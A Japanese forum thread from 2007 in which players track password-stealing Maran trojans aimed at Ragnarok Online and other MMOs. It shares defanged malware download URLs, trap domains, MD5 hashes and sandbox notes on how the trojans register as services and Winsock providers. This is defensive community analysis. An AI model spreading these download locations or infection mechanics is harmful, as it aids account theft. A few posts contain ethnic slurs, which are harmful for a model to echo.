つーかスレ違い

363 名前:(^ー^*)ノ〜さん:07/05/15 19:23 ID:zODgTtxx0
転生もちで総資産7Mってどんだけ貧乏なんだよww

364 名前:(^ー^*)ノ〜さん:07/05/15 19:28 ID:8KLUeHFp0
いや、マルチだからほっとけ。

365 名前:(^ー^*)ノ〜さん:07/05/15 19:55 ID:yAK1+0ga0
某支援ツールのBBSに、新規スレで貼り付けられていた。
文章に違和感はないから、どっかのブログからコピペかな?
URLは既出。

----------------------------------------
アカウントハック
----------------------------------------
1 名前:ねこムス[] 投稿日:07/05/15(火) 17:16:01 ID:euMQuTaK
今日はちょっとアカウントハックのお話。
ROアカウントハックの二次被害にあいました。( ̄▽ ̄)
アカウントハックされてアイテムを奪われたわけでなく、
アカウントハックをするために、私の書いた記事が使われていたようです。
他人のサイトのBBSやコメント覧に、ウチの記事に
アカウントハック用のURLをつけた物が、貼り付けられていたようです。
ROとは関係ないサイトにも貼られていました。
ユーザーイベントを盛り上げようとして書いたものを、逆の事に使われるとはとても残念です。
該当記事と似た書き込みがあった場合、削除して頂ければと思います。
http://www■aehatena-jp■com/news/100658432/
↑Web拍手(コメント送信可能)
----------------------------------------

366 名前:(^ー^*)ノ〜さん:07/05/15 20:00 ID:yAK1+0ga0
スレ違いだが・・・・

> 転生もちで総資産7Mってどんだけ貧乏なんだよww

俺なんか、たぶん5M無いぞ?
支援プリで、身内で狩していて、3年かけてようやく転生した。
清算テキトーだし、効率<<<楽しさメインの狩をしていると、金も装備もたまらんw
垢ハク対策だけは必死にしているが、あまり意味は無いと思われ。

367 名前:(^ー^*)ノ〜さん:07/05/15 20:19 ID:Q1I5Z3WW0
EXCITEブログでID取った模様?
http://ragnarokol■exblog■jp/
で宣伝書き込みがあった「訪問ありがとうございます」ってことだったけど
訪問した覚えがないので調べたところ
自動で飛ばす物は見つからなかったけど
興味を引きそうな記事に危険URLがリンクで貼ってあった

excite以外のリンクは↓の三つ
http://www■jklomo-jp■com/game/
http://www■fanavier■net/links/
http://www■cityhokkai■com/games/

木更津キャッツアイのスキン使ってるのかTV局へのリンクもあったけどそれは除外

368 名前:(^ー^*)ノ〜さん:07/05/15 21:20 ID:8KLUeHFp0
>>343 >>348 >>357
対応報告自体ははまだきてないですが、NOD32で検査すりぬけを起こしていたファイルについて
最初の報告から約24時間で対応済みになってました。

2007/05/15 18:58:45 に自動更新した、ウイルス定義ファイル
バージョン 2267 (20070515)にて、下記の3ファイルが
Win32/PSW.Maran.EI トロイ として検知できるようになっているのを、つい先程確認。

chengzhi■exe
svch■exe
zhixiaogui■exe

369 名前:(^ー^*)ノ〜さん:07/05/15 21:27 ID:EvtqpBCb0
超乙。

370 名前:(^ー^*)ノ〜さん :07/05/15 21:27 ID:UzJI0zok0
>>366
ゆとりってことか・・・
資産って言葉を辞書引いてしっかり理解しといた方がいいぞ。
資産と所持金って違うって理解しようね。

>>367
見に行ってきた。表示されてる画像などもすべてハックトロイURL誘導になっててわらったw
exciteだとインフレーム仕込めないからどうにか誘導しようと必死すぎ。
どれも既知のドメインで、VBScriptを突いたトロイだね。
あと、そのブログをexcitに通報してブログ削除と管理人を追わせた方が良いかと。

371 名前:(^ー^*)ノ〜さん:07/05/15 21:35 ID:WAaZ9k960
>>367
一番下にある「祝!exblog ブログ創設!」のエントリにある旧blogへの
参照URLは、見かけは実在するblogのURLだが実際のリンクは以下の通り。

http://www.homepage-nifty■com/blog/
Registrant Name ................. zhiqiang lin
Expiration Date ................. 2008-04-13 06:49:02


ついでに…

ダメダメ旅行代理店のサウスバウンドですが、うすのろにクレーム入れた
結果 index.aspからは消えていました。

駄菓子菓子。新URL登場。
http://www.southbound-inc■com/list.asp

もうだめぽ。

372 名前:367:07/05/15 23:30 ID:Q1I5Z3WW0
exciteに通報してきました
あとは対応を待つばかり

373 名前:(^ー^*)ノ〜さん:07/05/16 02:10 ID:PqwBNS0X0
>>371
ここまで酷いと、root権限(IISだからadmin権限か)を奪われているか、或いは、どちらかの社内に実行犯が
入り込んでいる可能性を疑う必要が出てきそうだな。

374 名前:(^ー^*)ノ〜さん:07/05/16 07:00 ID:778H8Qbs0
>>373
Administratorsの既存のアカウントのパスが割れたのは想像できるが
(そのまま使われているのか別のアカウントを作成されたのかは知らんが)
現存するアカウント全ての権限のチェックと、なぜ奪われたのかを調べて
再発を防止しないと何度でも改竄されるだろうになぁ。
フィリピンの旅行代理店もこんなクソ業者に頼んでると信用無くすだろうに…。

375 名前:(^ー^*)ノ〜さん:07/05/16 10:57 ID:778H8Qbs0
うすのろのサーバをいくつか見てみた。
Apache/1.3.12 (Unix) (Red Hat/Linux)
Apache/1.3.22 (Unix) PHP/4.0.6
Apache/1.3.27 (Unix) PHP/4.3.2
Apache/1.3.37 (Unix) PHP/4.4.4
Apache/2.0.49 (Unix) PHP/4.3.4
Apache/2.0.53 (Unix) PHP/4.3.11
Microsoft-IIS/5.0        ←southbound-inc
見事にバラバラというか、ApacheやPHPが無駄に古い。
これは釣堀(ハニーポット)なのか? コレクションなのかは知らんが
(その割にはApache2.2やPHP5が見当たらんが)物騒だな。

376 名前:(^ー^*)ノ〜さん:07/05/16 11:08 ID:778H8Qbs0
www■ezbbsy■com/bbs/ro.exe
www■lineage321■com/bbs/dsgdfhr.exe
今日の0時〜2時くらいに更新。
古い形式(カスペでMaran.cj)だったので
普通に検知できるものと思われ。

377 名前:(^ー^*)ノ〜さん:07/05/16 13:44 ID:th/Un/HH0
>>290
今更だが、Trojan-PSW.Win32.Maran.eiの情報を見つけたから、参考までに。
ttp://www.ahnlab.co.jp/virusinfo/view.asp?seq=2652

DLLインジェクションという手法により、Windows上で動いているすべてのプロセスにDLLを注入して、
キー入力処理を横取りし、打ち込んだ文字を盗むという方法を取っているようだ。

378 名前:(^ー^*)ノ〜さん:07/05/16 17:06 ID:PTUaM5Y20
>>372
俺も苦情入れたらこんな返答が帰ってきた
---
いつもエキサイトをご利用いただきまして誠にありがとうございます。
エキサイトカスタマーサポート○○と申します。
詳細なご報告いただきまして、ありがとうございます。
お知らせいただきましたブログにつきましては、エキサイトブログ管理
者にて
確認の上、必要に応じ、弊社既定の対応をさせていただきます。
---
だとさ。

379 名前:(^ー^*)ノ〜さん:07/05/16 17:23 ID:mcJckO+P0
>>377
あれ、独自のサービス使うのか。
WinSockに寄生するタイプ(昔のMaran)とは違うのね。
Upackで固められると何やってるんだかわかんね。

380 名前:(^ー^*)ノ〜さん:07/05/16 18:10 ID:qZ26gAud0
【  アドレス   】 http://www■maplestorfy■com/lunimkabuges
【気付いた日時】 2007/05/16 15:40:24
【     OS    】 Windows XP HomeEdi SP2
【使用ブラウザ 】 IEバージョンまではわかりません
【WindowsUpdateの有無】 2〜3日前
【 アンチウイルスソフト 】 avast! Windows Defenfer
【その他のSecurty対策 】 ルータ
【 ウイルススキャン結果】avast! Windows Defenfer共に
【スレログやテンプレを読んだか】 軽く目を通した程度
【説明】
メイン・サブPC共にRo起動中にサブPCにてブログを見て回っている時にうっかり踏んでしまい
avast!とWindows Defenferが同時に反応、Defenderが警告と同時に接続をストップ
しばらくRo起動して回線つないだままでしたが、踏んだほうのPCは回線RO共にストップ
現在メインPCで書き込み中、メインPCつなぎっぱなしだけどダイジョウブかな・・・?

381 名前:(^ー^*)ノ〜さん:07/05/16 18:11 ID:qZ26gAud0
って、ごめんなさい、若干気が動転しててあげちゃいました。

382 名前:(^ー^*)ノ〜さん:07/05/16 18:28 ID:TRVF/cU00
ageるのは、警鐘の意味で問題無い。

セキュリティソフトが反応してブロックしていれば問題無い。
念のため、カスペオンラインスキャンでフルスキャンかけてなにも出なかったら基本的には安心していい。

383 名前:(^ー^*)ノ〜さん:07/05/16 18:32 ID:xNQEV7WC0
喰らったと思ったらOS入れなおし
これが確実

384 名前:377:07/05/16 20:32 ID:th/Un/HH0
>>379
いや、WinSock感染型も依然猛威を振るってると考えて良いと思う。
トレンドマイクロのウイルス情報ページを見ると、
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_MARAN.D&VSect=Td
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_MARAN.KZ&VSect=Td

このスレでも良く出てくるTSPY_MARAN.Dや、最近登場したTSPY_MARAN.KZなどを見ると、
マルウェア(DLL)がWinSock2のLSP(Layered Service Provider)として登録されて、
ブラウザを起動したときなどに、DLLが自動的に組み込まれ、パスワードなどを盗むようだ。

●WinSock
アプリケーション向けWindowsネットワークソケット機能。
これを使えば、アプリケーションからお手軽にネットワーク機能を利用できる。

●LSP(Layered Service Provider)
これにDLLを登録すると、WinSockの機能を拡張できる。
悪意のある拡張を施されると、SSL暗号化前のパケットを盗むことも可能なので、
パスワードを盗むトロイなどに利用されている。
LSPはWinSock2(WinSockのバージョン2)で新たに実装された機能である。

参考記事 ⇒ ttp://journal.mycom.co.jp/news/2007/03/26/383.html

385 名前:(^ー^*)ノ〜さん:07/05/16 20:45 ID:X9q0/Z5l0
ああ、うん、それはわかる。>>376 見てもわかるとおり旧型も混ぜてる。

386 名前:(^ー^*)ノ〜さん:07/05/16 21:40 ID:0qtHwe/L0
ウイルスチェックしたら

janeのログに検出されました
削除で駆除できるのでしょうか

387 名前:(^ー^*)ノ〜さん:07/05/16 21:43 ID:1m4023Mk0
そんな質問内容で判る奴は居ない

388 名前:377:07/05/16 21:47 ID:th/Un/HH0
>>377の情報ページに単にWinSockに関して書かれてないだけかなと思ったので、
試しにTrojan-PSW.Win32.Maran.eiとして検出されるトロイをPE Explorerで調べてみた。

今回調べたのはこれ↓ (>>342-343、また>>380がダウンロードするトロイもこれ)
www■maplestorfy■com/lunimkabuges/zhixiaogui■exe

ImportTableを覗くとWS2_32.dll内のWSCInstallProvider関数が使用されてることが分かるので、
WinSock感染型と見て良さそう。WinSockに感染するだけでは、パケがアプリ側で暗号化された場合に、
解読できなくなってしまうので、キーロガー型と併用してるんだと予想してみる。

389 名前:(^ー^*)ノ〜さん:07/05/16 21:47 ID:kxYN4J8C0
大方ノートンがウイルスコードに反応しただけだろうな
なんにせよスレ違いなのでお引き取りください

390 名前:(^ー^*)ノ〜さん:07/05/16 21:57 ID:0qtHwe/L0
>>389
ありがと

セキュリティーは入れてないので
メールとかもwebでやってるし
垢ハックされたら引退するからいいや

391 名前:(^ー^*)ノ〜さん:07/05/16 22:06 ID:zmBM4SNY0
引退おめ

392 名前:(^ー^*)ノ〜さん:07/05/16 22:29 ID:fBJiFMI60
Liveroのほうに書き込んでしまいました。
こちらのほうが良さそうなので、こちらで質問させていただきます。

今習慣になってるカスペスキャンしたんですが
Trojan-Downloader.Java.Agent.c ZIP:感染-1なるものが検出されました。

半日前にスキャンしたときは異常なく、その後お気に入りのページを数箇所回った
程度で、怪しいアドレスを踏んだ記憶もありません。
ググってもこのトロイの実体がつかめなかったので、何かお解りの方がいたらご教授お願いします。
ROに影響のあるトロイなのかすら解らないもので・・・申し訳ありません。

393 名前:(^ー^*)ノ〜さん:07/05/16 22:47 ID:9hs7jkbw0
>>392
スパム電子メールに添付されたトロイの木馬じゃないの?

394 名前:(^ー^*)ノ〜さん:07/05/16 22:48 ID:HOYfQp+P0
>>390
小学生並の理論だな・・・
ウィルスがROの垢ハックだけだとでも思ってるのか?

webメールなんぞキーロガーやSS連続送信系の罠でも貰ってたら
簡単にハッキングされるんだよ?
そして君のアドレスから友人達にウィルス添付メールばら撒かれるかもしれん。

悪い事言わないから今からでもセキュリティを見直すんだ。

395 名前:(^ー^*)ノ〜さん:07/05/16 23:11 ID:PTUaM5Y20
毎度おなじみ福建人が複数ドメインを短時間で4つ登録。
なんちゃってXREA初登場。

Domain Name ..................... rentalbbs-livedoor■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-05-15 07:11:45


Domain Name ..................... samples112xrea■com
Expiration Date ................. 2008-05-15 06:56:50


Domain Name ..................... raginfoy■com
Expiration Date ................. 2008-05-15 06:51:00


Domain Name ..................... ragnarokgvg■com
Expiration Date ................. 2008-05-15 07:01:40

396 名前:(^ー^*)ノ〜さん:07/05/16 23:21 ID:L4rCpZbP0
旧未実装wikiのアドか

397 名前:(^ー^*)ノ〜さん:07/05/17 04:34 ID:ZBhs7HvH0
ttp://vil.nai.com/vil/content/v_142170.htm
(下のAll Information参照)
ここでも何度か出ている台湾Gamania用のトロイだけど、感染すると
USBメモリ等にもドロップしてAutorunするのが新しいか。
Autorunは昔から切れと言われているが、ネカフェ等に持ち込む人は注意。

398 名前:(^ー^*)ノ〜さん:07/05/17 04:37 ID:ZBhs7HvH0
↑あ、アドレスが一見うさんくさいけど
NAI=NetworkAssociates、McAfeeです。AVERTも。

399 名前:(^ー^*)ノ〜さん:07/05/17 04:58 ID:p1N1Ta/n0
>>397-398
日本語のページもあるようなので一応。
ttp://www.mcafee.com/japan/security/virPQ.asp?v=PWS-Mmorpg.gen

400 名前:(^ー^*)ノ〜さん:07/05/17 08:40 ID:djjMvujc0
>>395
4つともIP同じだね。香港か…。

401 名前:(^ー^*)ノ〜さん:07/05/17 09:08 ID:yn/9kb8U0
>400
割り当て的にも中国では?
IPが125.65.112.32で、125.64.0.0 - 125.71.255.255 は CHINANET になってるし。

402 名前:(^ー^*)ノ〜さん:07/05/17 09:20 ID:p1N1Ta/n0
ネットワークから隔離した仮想PC内(Windows2000 SP4)で、わざとmaran(↓)に感染させてみた。
www■maplestorfy■com/lunimkabuges/zhixiaogui■exe
(MD5:23C190849CA2353936A403B9079990E8)

最低でも2つのファイルが作成されることを確認。なお、元のEXEは実行後、消滅する。
C:\WINNT\svchost.exe
C:\WINNT\system32\tj9viewer.dll

svchost.exeの方はサービスとして登録され、
tj9viewer.dllの方はWinSock Providerとして登録された。

svchost.exeの方は常駐するようで、タスクマネージャでも確認できるが、
正規のsvchost.exeが多数立ち上がってるので、確認しづらい。
(フルパス表示できるソフトなら判別できる)

感染テストの結果を画像ファイルに保存しておいたので、興味のある方はどうぞ
ttp://www.mmobbs.com/uploader/files/2612.zip

403 名前:(^ー^*)ノ〜さん:07/05/17 10:11 ID:VCR5BBAc0
スレ読んでてあまり理解できなかったので質問ですが
270の方の1個目の記事のURLってアカハックですか?
間違って踏んでavastで遮断され、ウイルススキャンでは何も出なかったんですが、その場合は大丈夫なんでしょうか?

404 名前:(^ー^*)ノ〜さん:07/05/17 10:13 ID:yn/9kb8U0
>402
検証乙です。

>元のファイルが検出可であれば、感染後のファイルも検出可なのかと言うと、必ずしもそうではないようだ。

これが怖いねぇ……

405 名前:(^ー^*)ノ〜さん:07/05/17 10:18 ID:yn/9kb8U0
>403
jpxpie6-7netもomakase-netもアカハックアドレス。

遮断されたのなら多分平気と思うが、念のためカスペのオンラインスキャンで
チェックして、見つからなければ恐らく平気。

ちなみに誰も「大丈夫」なんて保障は出来ない。
「多分」「恐らく」というレベル。

それとどちらのアドレスも既知のアドレスのため、hostsの変更やPG2の導入と
いった対策が有効。
スレやまとめサイトを読んで導入した方が無難。

406 名前:(^ー^*)ノ〜さん:07/05/17 10:22 ID:VCR5BBAc0
>405
早い返信どうもありがとうございます。
色々調べて早速導入してみます。

407 名前:(^ー^*)ノ〜さん:07/05/17 10:37 ID:yn/9kb8U0
またしても、あこすれてんぷら(本家)に罠ページが作成されてた。
貼られたアドレスは既知のものばかりだし、罠ページもTOPからのリンクは無い
(ページ一覧から探す必要がある)ので、被害者はいないと思うけど。

---------------
> *各職業別Wiki [#j7ee113f]
> 各職業に特化して書かれたWikiです。
> いろいろなテクニックや装備、スキル考察などがあるので、勉強になりますよ
(中略)
> ▼あこすれてんぷら
> [[http://applepie■leminx■com/>http://www■interzq■com/bbs]]
>
> ▼Crusader Template
> [[http://crsdr■netgamers■jp/>http://www■interzq■com/bbs]]
>
> ▼マジスレテンプレ
> [[http://www■eldgasyk■jp/~wizard/>http://www■ragnarok-search■com/bbs]]
>
> ▼ローグテンプレ
> [[http://mohige■s253■xrea■com>http://www■biglobe-ne■com/bbs]]
(以下略)
---------------
見かけは普通のリンクだが、バーに出るのは罠アドレスというパターン。
中華も必死というか、なんというか。

408 名前:(^ー^*)ノ〜さん:07/05/17 11:05 ID:djjMvujc0
>>401
ごめん、名前が引けたのが61.15.141.234だったんで早とちりした。

409 名前:(^ー^*)ノ〜さん:07/05/17 11:46 ID:djjMvujc0
>>402
乙。踏んでばらけたファイルまで検知・駆除できるかどうかは
解析チームがいい仕事するかどうかにかかってるんだよねぇ
(送ったファイルに対してだけシグネチャを作っていたら感染後にスキャンしても無駄)。
その辺も考えて、ドロッパとトロイが綺麗に分かれていた頃は
こちらでPEヘッダ前後でバラして送っていたんだが…。

410 名前:(^ー^*)ノ〜さん:07/05/17 12:07 ID:djjMvujc0
>>407
3つとも同じなのね。
wu.htm wz.htm → happy1.htm happy2.htm happy3.htm
ちょっと懐かしい(ani発覚前の)形式。
www■interzq■com/bbs/t1.exe 5月4日製造のよくあるMaran。
今更こんなのを爆撃するところを見ると、どうも本部と
爆撃部隊との意思疎通がとれていない気がするなぁ。

411 名前:(^ー^*)ノ〜さん:07/05/17 22:49 ID:VoX9lqte0
毎度おなじみ福建人の新ドメイン。

今回のも法則性がある、キーワードはTWだ。
TWなんたらと言う福建人の罠ドメインはすでに幾つか確認されている。

Domain Name ..................... twyaooplay■com
Registrant Name ................. zhiqiang lin
Expiration Date ................. 2008-05-16 11:32:29

412 名前:(^ー^*)ノ〜さん:07/05/18 00:38 ID:sUQ9fRa40
いつもお世話になっています。
<ツールのバグ報告のコピペ>
引き続き出来る範囲で調べてみます。
http://www■runbal-fc2web■com/test/100865889/
  ↓iframeで下記を呼び出し↓
http://www■gamesmusic-realcgi■net/test/100865889/Ms06014■htm

413 名前:(^ー^*)ノ〜さん:07/05/18 06:41 ID:jVYMRpw60
>>411
xp.htmからスクリプト経由で、sp2.htmから0day.jpg経由で
www■twyaooplay■com/gisl.exe
100kBほど。台湾向けと思われ。昨夜20時過ぎに製造、gamanirと同一犯?
そのgamanirは今日の0時過ぎに2007mmm.exe更新。

>>412
www■gamesmusic-realcgi■net/test/100865889/svch.exe
try〜catchな最近よく見るMaran。8日製造。
ドメインのネーミングセンスは www■jpxpie6-7net■com っぽいけど
ディレクトリの数字の羅列はahatenaやsoultakerbbsの人かなぁ。

さて、検体スキャンしてきます…。

414 名前:(^ー^*)ノ〜さん:07/05/18 07:23 ID:jVYMRpw60
とりあえずKasperskyとMcAfeeが3匹とも捕獲。

415 名前:(^ー^*)ノ〜さん:07/05/18 12:07 ID:nCVQ4+3C0
>>413が実行された場合・・・

www■gamanir■com/2007mmm■exe
(MD5:2B92ADB67BFBFA39876C582A2DA11842)
→ %WinDir%\avp.exe  (サービス名 vGADown で登録)
→ %WinDir%\system32\hsvwer9.dll  (Winsock Providersに登録)

www■gamesmusic-realcgi■net/test/100865889/svch■exe
(MD5:EF39239F1A48554AE11963898E72F38C)
→ %WinDir%\svchost.exe  (サービス名 ADIDown で登録)
→ %WinDir%\system32\tj9viewer.dll  (Winsock Providersに登録)

www■twyaooplay■com/gisl■exe
(MD5:E0C003E0F08DD80E2D3BD02146046210)
→ %WinDir%\avp.exe  (サービス名 VGADown で登録)
→ %WinDir%\system32\hsvwer9.dll  (Winsock Providersに登録)

しばらくの間、感染後のファイルがどこに登録されるか調べてみようと思う。
傾向が掴めれば、特にそこを重点的に防御することも可能だし。

感染後のファイル名は検体毎に異なるけど、exeをサービスに登録し、
dllをWinsock Providerに登録するという点では今のところ同じ手口と言える。

416 名前:(^ー^*)ノ〜さん:07/05/18 12:20 ID:EbI3IP330
手法は同じなんだね。同じUpackで固めてあっても
台湾向けのサイズは2倍以上と明らかに大きいので、
機能は異なりそう。

417 名前:415:07/05/18 12:27 ID:nCVQ4+3C0
ごめ。>>415のMD5間違ってた。検体の差し替えが頻繁に行われてるから、
同一性確認のためにMD5も書いておいたんだが、うっかりUPack解凍後のMD5を書いてしまった。
というわけで、正しくは↓です。

www■gamanir■com/2007mmm■exe
(MD5:B81E3A9FCC07E2B633063DD52DB1F626)

www■gamesmusic-realcgi■net/test/100865889/svch■exe
(MD5:E392313EE9C31AAFC0453F1C50189BA4)

www■twyaooplay■com/gisl■exe
(MD5:515DC3D1FE10CF5F52E0901611560158)

418 名前:415:07/05/18 13:28 ID:nCVQ4+3C0
バスターがスルーしたので、以下の検体2種をトレンドマイクロに発射しときました。
www■gamanir■com/2007mmm■exe
www■twyaooplay■com/gisl■exe

>>416
機能が違うのか、あるいはターゲットとしているゲームが違うのかも。

hsvwer9.dllをバイナリエディタで開いて、httpで検索かけると
URLが18個ほど見つかって、全部gananiaだった。一例を挙げると↓
https://tw■login■gamania■com/home_login■asp  (危険アドレスではないが一応■=ピリオド)

ROが関係ないかというと、そんなことはなく、
61.220.60.11 (Ragnarok-Alfheim)
のような文字列も埋まってた。でもこれjROじゃないな。

tj9viewer.dllの方も調べてみたけど、こちらは、
211.13.228.22 (Ragexe-worldgroup1)
など明らかにjRO狙いと思われる文字列を発見。
URLらしきものは見つからなかった。

419 名前:(^ー^*)ノ〜さん:07/05/18 13:57 ID:NKd7RSvx0
TWって、台湾だよね。
台湾も中国だとかいいつつ狙うとは、支那人って節操ないね(;´д`)

台湾のgamaniaも狙われているとなると、もうMMO全般は狙っていると考えていいのかな…。
・・・まぁ、MMO「だけ」じゃないだろうけど。

420 名前:(^ー^*)ノ〜さん:07/05/18 14:09 ID:P+e7wGFv0
台湾はLineageもGamaniaが運営してるからなー。

421 名前:(^ー^*)ノ〜さん:07/05/18 15:53 ID:lgRcjVQk0
えーと・・・ハックされた場合、癌に報告しても一切の追跡調査も無く、
被ハックアカとハックアカの間での巻き戻りも期待は全く出来ない、
ってことでいいんでしたっけ?

422 名前:(^ー^*)ノ〜さん:07/05/18 15:55 ID:uZp/ydns0
数ヶ月かかったようですが一応装備は戻ってきたと言う報告は何件かあった。
ちなみに癌だけじゃなくて警察にも通報しないとダメよ。

423 名前:(^ー^*)ノ〜さん:07/05/18 16:00 ID:lgRcjVQk0
一応諦めずに報告しておけって事ですかね。
しかし警察にも・・・ですか・・・サイバーポリスってやつですか?
ttps://www.cyberpolice.go.jp/request/index.html
ここら辺から問い合わせていけば良さそうですね、どうもです。

424 名前:(^ー^*)ノ〜さん:07/05/18 16:08 ID:uZp/ydns0
そこら辺は実体験ある人やもっと詳しい人がいるはずなので、
また時間たって見に来てみればもっといいアドバイスがあるかも。
とりあえず喰らってしまってまだウィルスが残っているようならば駆除をしましょう。
更に他のパスワードや入力を読み取られてしまうかもしれない。

425 名前:(^ー^*)ノ〜さん:07/05/18 16:23 ID:P+e7wGFv0
んー、直接出向くことになるよ。何回か。
自宅からメール送っただけで警察が動いてくれると思うなよ?

426 名前:(^ー^*)ノ〜さん :07/05/18 21:43 ID:Kt76YVAB0
みんななんか勘違いしてるけど、トロイ等により垢ハックにあったのは個人のPCで、
被害者はあくまでも個人ユーザー。ガンホーとしては垢ハッキングによる実被害は無い。
ハッキングは犯罪だからハッキング被害者として警察に相談するようにとテンプレが返ってくるわけ。

ガンホーが動く理由は不正アクセス。
ハッカーがハッキングして盗んだID等で不正アクセスしたことにより不正アクセス被害者になる。OK?

427 名前:(^ー^*)ノ〜さん:07/05/18 21:47 ID:P+e7wGFv0
みんな? 一部じゃね?

428 名前:(^ー^*)ノ〜さん:07/05/19 01:46 ID:BvmNNpCB0
>>417
後れ馳せながらチェック。NOD32もカスペもちゃんと検出しました。

NOD32
2007mmm.exe : Win32/PSW.Maranの亜種(自動提出済)
gisl.exe : Win32/PSW.Maranの亜種(自動提出済)
svch.exe : Win32/PSW.Maran.EI

Kaspersky
2007mmm.exe : Trojan-PSW.Win32.Maran.ez
gisl.exe : Trojan-PSW.Win32.Maran.eq
svch.exe : Trojan-PSW.Win32.Maran.ei

429 名前:(^ー^*)ノ〜さん:07/05/19 03:07 ID:feMa2qWK0
またもや、あこすれてんぷら本家のTOPが改竄されてた。
……のだが、何を考えてるのか良く分からない改竄の仕方になってた……

-----------

-----------
// セキュリティ面の不安を考慮すると、このWikiそのもの、むしろPHP自体を停止した方が
// 良い時期なのではないでしょうか。
// ttp://wiki■ohgaki■net/index.php?PHP%2F%C0%C8%BC%E5%C0%AD%A5%EA%A5%B9%A5%C8%2FPHP4#content_1_5
// ttp://www■php■net/ChangeLog-4.php
-----------
改竄
-----------
// セキュリティ面の不安を考慮すると、このWikiそのもの、むしろPHP自体を停止した方が
// 良い時期なのではないでしょうか。
// http://www■netgamelivedoor■com/online/
// http://www■netgamelivedoor■com/online/
-----------
いや、そこコメントアウトされてる部分だから……

ついでにその最期に「・・・・・・・・」という1行が先日から追記されてたが、無害なので放置してたら
こういう事態に。
Wikiを見回りしてる人が居るかどうかのチェックに使ってたのかもしれないが、つまり人力手動で
書き換えてるって事だよねぇ……
改竄部隊って書き換えた後にリンクが生きてるかの確認もしないんだろうか?

430 名前:(^ー^*)ノ〜さん:07/05/19 03:27 ID:feMa2qWK0
ついでにソースチェッカーで見てみると
www■conecojp■net/online/jpt1.exeをDLさせてる。
パッと見、MDACの脆弱性の罠に見えた。
%temp%にL_iy80.scrとして保存して実行してるのかな?

netgamelivedoorもconecojpも既知のアドレスでまとめサイトさんの所に
載ってるし、何よりコメントアウトされてる部分の改竄なので無害なわけですが。

それともWikiをメンテする人を狙った罠のつもりだったんだろうか?

431 名前:(^ー^*)ノ〜さん:07/05/19 06:05 ID:9kkpv1aV0
>>419
台湾はマザーボードメーカーが多数存在するほど、技術の水準も生活水準も高い訳で。
一部のエリートを除けば見るも無い大陸側からは、当然のごとく標的にされる。
外省人が犯罪行為に及ぶ際に、本省人を騙るのも良くある事のようだし。

432 名前: ◆sp4Sh9QXGI:07/05/19 10:11 ID:oVJADcar0
えぇと。
1週間ほど消失しておりましたが先ほど更新しました…(っ´-ω-)っ

433 名前:(^ー^*)ノ〜さん:07/05/19 10:19 ID:s9jpOUix0
おつかれさまです。

434 名前:(^ー^*)ノ〜さん:07/05/19 17:39 ID:CAzVMgFt0
乙であります。

435 名前:(^ー^*)ノ〜さん:07/05/19 19:32 ID:LTFrWOas0
>>376および>>430の感染後調査

www■lineage321■com/bbs/dsgdfhr■exe
(MD5:0C6722CD823F9A6F7F8D3282A231F4BB) (Trojan-PSW.Win32.Maran.cj)
→ %WinDir%\svchost.exe       (サービス名 ADIDown で登録)
→ %WinDir%\system32\tj2viewer.dll  (Winsock Providersに登録)

www■ezbbsy■com/bbs/ro■exe
(MD5:77599D6CB1DA8C1DB95EF04DB6093DC1) (Trojan-PSW.Win32.Maran.ei)
→ %WinDir%\svchost.exe       (サービス名 ADIDown で登録)
→ %WinDir%\system32\tj9viewer.dll  (Winsock Providersに登録)

www■conecojp■net/online/jpt1■exe
(MD5:49A9DFDD4EEFE317285EEE10E63A6AC3) (Trojan-PSW.Win32.Maran.ei)
→ %WinDir%\svchost.exe       (サービス名 ADIDown で登録)
→ %WinDir%\system32\tj9viewer.dll  (Winsock Providersに登録)

MD5の右側のはカスペでのウイルス名です。
旧種?ということでTrojan-PSW.Win32.Maran.cjも調べてみたけど、
サービスやWinsockに登録しているという点では、他と同じでした。
SysInternalsのFilemonで調べた限りは、上記以外に作ってるファイルは
自分自身を消去するためのバッチファイルのみでした。

436 名前:(^ー^*)ノ〜さん:07/05/20 02:54 ID:/3VSYIRn0
捨て垢2つ取ってキャラ名を天安門事件1 天安門事件2と全鯖埋めて
お試し期間切れた後に罠サイト踏みまくって垢ハクされてみた。
1dayで課金してくれるらしく捨て垢がちょくちょく有効になってる

またかよ鯖の倉庫にいれといたやわ毛2個取られたので通報してきますwwww

437 名前:(^ー^*)ノ〜さん:07/05/20 08:21 ID:gnHs7e820
ボクのやわ毛返してwww

438 名前:(^ー^*)ノ〜さん:07/05/20 09:54 ID:lMmpYWKO0
 hostsリストの導入をしたのですが、チャントできているかが不安で、自分でやった
手順を書きますので、正しいか教えていただけませんか。

「ファイル名を指定して実行」→notepad %Systemroot%\system32\drivers\etc\hosts
開いたメモ帳に、リストを追加。

# System Hosts File
# DO NOT REMOVE IT !
127.0.0.1 localhost
#
# Trojan trap sites
#
(中略)
#
# End of trojan trap sites
#

 と、なったら上書き保存。属性を「読み取り専用」に変更。
 以上の事をやりました。これで正しいのでしょうか?

439 名前:(^ー^*)ノ〜さん:07/05/20 10:24 ID:vxgvGmSN0
www■mbspro6uic■com/mbsplink/xiaogui.exe
Packし忘れた(?)、生のMaran(151kBほど)。
教本としてはいいかと。PEヘッダは3つ。
適当にぶった切ってスキャンすると手抜きなシグネチャがばれる。

>>438
いいんじゃね? LiveROでどぞ。

440 名前:(^ー^*)ノ〜さん:07/05/20 11:09 ID:cYAmwYwB0
>>438
正しいかどうかを判断できないなら導入するべきではない。

441 名前:(^ー^*)ノ〜さん:07/05/20 11:17 ID:DveE+V+10
>>440
438はたぶん手動更新なので、やるのはよいんじゃないかな。
自動ツールはお勧めしないけど。

442 名前:(^ー^*)ノ〜さん:07/05/20 12:08 ID:9ElOLeej0
>>438
おkです。質問は次からLiveROの方でするといいです。

>>440
この場合においてその返答はちょっと宜しくない。

443 名前:(^ー^*)ノ〜さん:07/05/20 14:39 ID:lMmpYWKO0
 皆さん返答ありがとうございます。
 質問はLiveROだったのですね。次からは気をつけたいと思います。

444 名前:(^ー^*)ノ〜さん:07/05/20 15:44 ID:yjDLCDWG0
理解せずに書き換えるのなら手動も自動も危険性は同じ。
理解して書き換え出来るなら手動にしようが自動にしようが、これまた同じ。

同じ危険性なら自動ツール導入した方がマシだと思うな。
更新忘れて被害に遭うよりはいいだろうし。

